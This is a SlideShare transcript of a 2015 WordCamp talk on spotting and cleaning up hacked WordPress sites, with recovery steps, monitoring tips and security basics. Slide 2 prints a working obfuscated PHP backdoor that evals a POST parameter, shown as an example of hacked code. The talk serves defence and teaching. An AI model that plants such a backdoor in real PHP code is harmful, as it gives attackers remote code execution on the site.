Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
YOUR SITE 

IS AND IS NOT
HACKED
@ASKWPGIRL #WCSLC
SCHRODINGER’S WEBSITE
You must assume your site is both hacked and not
hacked until you open the box and find out.
<?php
$q...
WordPress Instructor and Custom Theme Developer
Using WordPress Since 2007 —Version 2.2
Not a security expert, but I play ...
WHAAA?
1
WHY DO HACKERS HACK?
Deface sites for fun
Add spammy links to bad web
neighborhoods (SEO spam)
Hijack site to add spam, po...
WHAT DO HACKERS
ACTUALLY DO?
Create admin account
Reset passwords
Inject malicious code into content
Add malicious code to...
WHY SHOULD YOU CARE?
Performance issues
SEO tanks
Blacklisting or Phish Tank
Account closed
Angry customers
TYPICALLY, ONLY THE
MOST SEVERELY HACKED
SITES WILL BE
BLACKLISTED OR
SUSPENDED BY HOST
Many hacks are hidden
WHY ARE WORDPRESS
SITES VULNERABLE?
29%
8%
22%
41%
41% Hosting
22% Plugins
29% Themes
8% Weak
Passwords
RECENT VULNERABILITIES
Google Analytics WordPress 4.2.1
Backup to Dropbox FancyBox
TwentyFifteen
Revolution SliderGravity ...
LOW HANGING FRUIT
Vulnerabilities immediately published on the web
Hackers write bots to exploit vulnerabilities
Website o...
COMMON
EXPLOITS AND
HOW TO FIX
2
“SPOT THE HACK” GAME
A - Scan Site
B - Look at files on server
C - Find the hacked code
A
B
C
1 - Backdoors
PHP files uploaded to your server and accessed remotely. Severely
affect site and server performance. Not eas...
IT'S VERY COMMON, THAT
BACKDOORS DON'T HAVE
ANY VISIBLE SIGNS IN THE
SITE CODE AND IT'S
IMPOSSIBLE TO DETECT
THEM BY ACCES...
2 - Drive by Downloads
Script injected on website generates links to malware sites or
downloads malware from your site to ...
3 - Pharma Hack
Spam links injected onto web pages only visible to search
engines. Difficult to scan for because cloaked.
h...
4 - Malicious Redirects
Redirects traffic from your website to another typically by
modifying the .htaccess file, sometimes ...
DIY HACK RECOVERY
Via SFTP (preferred) or FTP
1 Backup:
Download
everything. Good to
examine later for
details of hack if
...
Why are people from
Thailand and Romania
accessing a strangely
named PHP file
somewhere?
Check raw access logs via cPanel
d...
Audit Activity on Site
https://wordpress.org/plugins/wp-simple-firewall/
Check WordPress core integrity
using Sucuri plugin https://
wordpress.org/plugins/sucuri-
scanner/
Run https://wordpress.o...
Finding and Removing Malicious Redirects
Listen to when someone tells you that they tried to
visit your site and couldn’t ...
Use Google Search Console!
Google Webmaster Tools/Search Console
Search Queries – you can spot queries irrelevant to you s...
Check for rogue users and posts
Your new admin friends?
Find hidden admin users: http://snipe.net/2010/01/when-wordpress-g...
IMMEDIATELY CHANGE
PASSWORDS
Use Sucuri plugin to Generate New Security Keys
Reset all passwords, including WordPress 

us...
See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
CLEAN UP “BAD” HACK
If hackers got admin access ...
REQUEST SITE REVIEW
If Google blacklisted your site or marked it for phishing
scam, you will need to request a review afte...
SECURITY
BASICS
3
UPDATE UPDATE UPDATE
Timely updates are critical for security. 

Tools: iControlWP, MainWP, InfiniteWP, Jetpack, ManageWP
h...
SECURE YOUR LOGIN
Online Generator: 

http://www.pctools.com/guides/password/
Track Passwords: 

http://agilebits.com/prod...
RUN A TIGHT SHIP!
Delete ALL unused stuff on server
Only use popular and well-maintained themes and plugins
Don’t allow us...
GOOD HOSTING
Correct File Permissions
WordPress Auto Updates
Firewall and Scanning
Regular Backups
Server Security
Perform...
EFFECTIVE SECURITY
PLUGIN FEATURES
Limit login access
Block bad URL requests 

with a Firewall
Audit activity

Security th...
BACKUPS
Common wisdom is to backup your site
Backups are to your site what major medical health
care coverage is to your h...
SECURE YOUR COMPUTER
Scan for viruses and trojans
Be careful about downloading stuff!!!!
RESOURCES
http://snipe.net/2010/01/when-wordpress-gets-hacked/
https://support.google.com/webmasters/answer/163633?rd=1 **...
CONTACT
facebook.com/askwpgirl


twitter.com/askwpgirl


http://askwpgirl.com
http://boulderdigitalarts.com
One-on-One con...
Upcoming SlideShare
Loading in …5
×

Your WordPress Site is and is not Hacked - You don't know until you check

3,603 views

Published on

These are slides from WordCamp Salt Lake City, September 12, 2015. WordPress Security with AskWPGirl.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Your WordPress Site is and is not Hacked - You don't know until you check

  1. 1. YOUR SITE 
 IS AND IS NOT HACKED @ASKWPGIRL #WCSLC
  2. 2. SCHRODINGER’S WEBSITE You must assume your site is both hacked and not hacked until you open the box and find out. <?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2]. $qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval($ {$s20}['q53b3a6']);}?>
  3. 3. WordPress Instructor and Custom Theme Developer Using WordPress Since 2007 —Version 2.2 Not a security expert, but I play one on WordPress.tv Angela Bowman 
 Ask WP Girl @askwpgirl
  4. 4. WHAAA? 1
  5. 5. WHY DO HACKERS HACK? Deface sites for fun Add spammy links to bad web neighborhoods (SEO spam) Hijack site to add spam, porn, gambling, pay-day loans content Steal sensitive information to sell Distribute malware to personal computers Use server resources for 
 distributed attacks
  6. 6. WHAT DO HACKERS ACTUALLY DO? Create admin account Reset passwords Inject malicious code into content Add malicious code to existing files or new files Redirect your website http://www.wpmayor.com/wordpress-security-based-facts-statistics/ Gravity Forms hack
  7. 7. WHY SHOULD YOU CARE? Performance issues SEO tanks Blacklisting or Phish Tank Account closed Angry customers
  8. 8. TYPICALLY, ONLY THE MOST SEVERELY HACKED SITES WILL BE BLACKLISTED OR SUSPENDED BY HOST Many hacks are hidden
  9. 9. WHY ARE WORDPRESS SITES VULNERABLE? 29% 8% 22% 41% 41% Hosting 22% Plugins 29% Themes 8% Weak Passwords
  10. 10. RECENT VULNERABILITIES Google Analytics WordPress 4.2.1 Backup to Dropbox FancyBox TwentyFifteen Revolution SliderGravity Forms JetPack Database of all vulnerable plugins and themes: https://wpvulndb.com/
  11. 11. LOW HANGING FRUIT Vulnerabilities immediately published on the web Hackers write bots to exploit vulnerabilities Website owners are oblivious: they don’t update, use weak passwords, install tons of plugins, use not-great web hosting
  12. 12. COMMON EXPLOITS AND HOW TO FIX 2
  13. 13. “SPOT THE HACK” GAME A - Scan Site B - Look at files on server C - Find the hacked code A B C
  14. 14. 1 - Backdoors PHP files uploaded to your server and accessed remotely. Severely affect site and server performance. Not easy to find.
  15. 15. IT'S VERY COMMON, THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE SITE CODE AND IT'S IMPOSSIBLE TO DETECT THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI
  16. 16. 2 - Drive by Downloads Script injected on website generates links to malware sites or downloads malware from your site to visitors’ computers. Easy for scanners to detect.
  17. 17. 3 - Pharma Hack Spam links injected onto web pages only visible to search engines. Difficult to scan for because cloaked. https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
  18. 18. 4 - Malicious Redirects Redirects traffic from your website to another typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone Hacked .htaccess file
  19. 19. DIY HACK RECOVERY Via SFTP (preferred) or FTP 1 Backup: Download everything. Good to examine later for details of hack if needed. 2 Delete 
 all except: cgi-bin .htaccess wp-config.php (examine these) 3 Upload fresh: WordPress Themes Plugins cleaned uploads
  20. 20. Why are people from Thailand and Romania accessing a strangely named PHP file somewhere? Check raw access logs via cPanel db12.php, css.php, dirs35.php???? MONITORING TIPS
  21. 21. Audit Activity on Site https://wordpress.org/plugins/wp-simple-firewall/
  22. 22. Check WordPress core integrity using Sucuri plugin https:// wordpress.org/plugins/sucuri- scanner/ Run https://wordpress.org/ plugins/gotmls/ to check 
 wp-content folder Look for modified dates, 
 unusual names, file types 
 that don’t belong Compare file list to original download Commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php Any file can be hacked! Finding PHP Back Doors Hmmmm? PHP in a CSS folder?
  23. 23. Finding and Removing Malicious Redirects Listen to when someone tells you that they tried to visit your site and couldn’t and find out which browser or device they were using at the time. Use http://www.botsvsbrowsers.com/ SimulateUserAgent.asp to verify Scan with Sucuri’s SiteCheck Check all the .htaccess files on the server and remove the redirect. https://sitecheck.sucuri.net/
  24. 24. Use Google Search Console! Google Webmaster Tools/Search Console Search Queries – you can spot queries irrelevant to you site. Links toYour Site – you can find suspicious incoming links here. Internal Links – this report can help reveal rogue sections of your site. http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
  25. 25. Check for rogue users and posts Your new admin friends? Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
  26. 26. IMMEDIATELY CHANGE PASSWORDS Use Sucuri plugin to Generate New Security Keys Reset all passwords, including WordPress 
 users, FTP, web hosting, control panel Scan computer for viruses!
  27. 27. See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination CLEAN UP “BAD” HACK If hackers got admin access to site or database, you might have to nuke the entire site from orbit — it’s the only way to be sure https://www.youtube.com/watch?v=aCbfMkh940Q Or contact sucuri.net for 
 site clean up and monitoring
  28. 28. REQUEST SITE REVIEW If Google blacklisted your site or marked it for phishing scam, you will need to request a review after you are certain you’ve cleaned up all hacked files:
 https://support.google.com/webmasters/answer/ 168328?hl=en
  29. 29. SECURITY BASICS 3
  30. 30. UPDATE UPDATE UPDATE Timely updates are critical for security. 
 Tools: iControlWP, MainWP, InfiniteWP, Jetpack, ManageWP http://askwpgirl.com/updating-wordpress-plugins-themes-core/
  31. 31. SECURE YOUR LOGIN Online Generator: 
 http://www.pctools.com/guides/password/ Track Passwords: 
 http://agilebits.com/products/1Password Enable Two-Factor Authentication: http://askwpgirl.com/wordpress-two-factor- authentication-plugins/ Avoid logging in on 
 public WiFi Networks

  32. 32. RUN A TIGHT SHIP! Delete ALL unused stuff on server Only use popular and well-maintained themes and plugins Don’t allow users to register (Settings > General) Always hold comments for moderation and use spam filtering (Akismet plugin)
  33. 33. GOOD HOSTING Correct File Permissions WordPress Auto Updates Firewall and Scanning Regular Backups Server Security Performance Optimization Managed WordPress Hosts: Site Ground WP Engine Get Flywheel Web Synthesis Pantheon
  34. 34. EFFECTIVE SECURITY PLUGIN FEATURES Limit login access Block bad URL requests 
 with a Firewall Audit activity
 Security through obscurity is not security IP addresses don’t matter and should not be used as the foundation of aWordPress security policy My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/ Does all the above and more.Will notify you of vulnerable plugins.
  35. 35. BACKUPS Common wisdom is to backup your site Backups are to your site what major medical health care coverage is to your health Usually only helpful in case of a disaster Services: VaultPress and WorpDrive good hosted solutions! Plugins: BackupBuddy (paid), BackWPUp, Duplicator
  36. 36. SECURE YOUR COMPUTER Scan for viruses and trojans Be careful about downloading stuff!!!!
  37. 37. RESOURCES http://snipe.net/2010/01/when-wordpress-gets-hacked/ https://support.google.com/webmasters/answer/163633?rd=1 *** http://aw-snap.info/articles/find-backdoor.php http://codex.wordpress.org/FAQ_My_site_was_hacked http://sucuri.net - free scan, hack recovering, site monitoring, 
 great posts on how to clean up specific hacks http://aswkpgirl.com/nuke-it-from-orbit https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4- login-protection-feature/ https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress- misinformation-virus/ About the banking hack: https://www.proofpoint.com/es/node/327 Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/
  38. 38. CONTACT facebook.com/askwpgirl 
 twitter.com/askwpgirl 
 http://askwpgirl.com http://boulderdigitalarts.com One-on-One consulting third Friday of every month at Boulder Digital Arts Six-week theme customization course in Colorado and online. SEO and Best Maintenance Tips Newsletter http://askwpgirl.com

×